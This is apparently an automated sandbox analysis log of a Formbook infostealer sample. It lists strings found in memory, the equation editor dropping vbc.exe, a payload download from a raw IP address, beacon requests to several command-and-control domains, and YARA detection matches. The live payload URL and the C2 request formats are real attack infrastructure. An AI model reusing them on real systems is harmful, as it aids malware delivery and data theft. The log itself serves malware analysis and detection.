          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 13:41:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: vbc.exeString found in binary or memory: http://kr.battle.net/heroes/ko/
          Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_
          Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.561983563.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680918872.0000000004310000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.562841566.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.492443400.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/account/verify_credentials.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/blocks/create.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/blocks/ids.json
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/direct_messages.json
          Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/create.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/favorites/destroy.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/favorites/list.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/friends/ids.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/friends/list.json
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/no_retweets/ids.json
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/update.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/destroy/
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.json
          Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/mentions_timeline.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/retweet/
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/show.json
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/
          Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
          Source: vbc.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.json
          Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/1.1/users/lookup.json
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/oauth/access_token
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/oauth/authorize?oauth_token=
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://api.twitter.com/oauth/request_token
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://pbs.twimg.com/media/
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpString found in binary or memory: https://twitter.com/
          Source: vbc.exeString found in binary or memory: https://twitter.com/Dalsae_info
          Source: vbc.exeString found in binary or memory: https://twitter.com/hanalen_
          Source: vbc.exeString found in binary or memory: https://upload.twitter.com/1.1/media/upload.json
          Source: vbc.exeString found in binary or memory: https://userstream.twitter.com/1.1/user.json
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0181866.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.atelifer.com
          Source: global trafficHTTP traffic detected: GET /rpm/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.13.176Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ HTTP/1.1Host: www.atelifer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ HTTP/1.1Host: www.floridawp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ HTTP/1.1Host: www.viscoent.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ HTTP/1.1Host: www.meta-bot.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: vbc[1].exe.4.dr, FlowPanelManager.csLong String: Length: 34816
          Source: vbc.exe.4.dr, FlowPanelManager.csLong String: Length: 34816
          Source: 6.2.vbc.exe.2a0000.0.unpack, FlowPanelManager.csLong String: Length: 34816
          Source: 6.0.vbc.exe.2a0000.0.unpack, FlowPanelManager.csLong String: Length: 34816
          Source: 7.2.vbc.exe.2a0000.1.unpack, FlowPanelManager.csLong String: Length: 34816
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 6_2_002A695C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00341380
          Source: C:\Users\Public\vbc.exeCode function: 6_2_003416E8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00343C40
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0034A6D3
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0034971F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_003437E1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00344AF0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00343C3D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00540C6F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_005400A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_002A695C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B8DD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C14C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C6C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CE9E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BCD005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BB905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA3040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C41238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC63DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA2305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BEA37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA7353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BB1489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BD5485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BDD47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BBC5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA4680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BAE6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C42622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BAC7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C2579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BD57C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C3F8EE
